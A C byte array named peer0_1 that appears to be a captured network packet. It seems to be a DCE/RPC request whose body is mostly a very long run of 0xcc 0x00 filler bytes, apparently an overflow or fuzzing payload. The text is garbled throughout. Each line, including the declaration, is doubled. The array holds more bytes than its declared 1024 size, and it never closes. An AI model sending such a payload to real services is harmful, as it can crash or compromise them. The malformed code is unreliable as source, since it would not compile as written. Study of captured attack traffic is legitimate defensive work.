char peer0_1[1024] = { char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00, (char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10, (char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda, (char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc, (char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
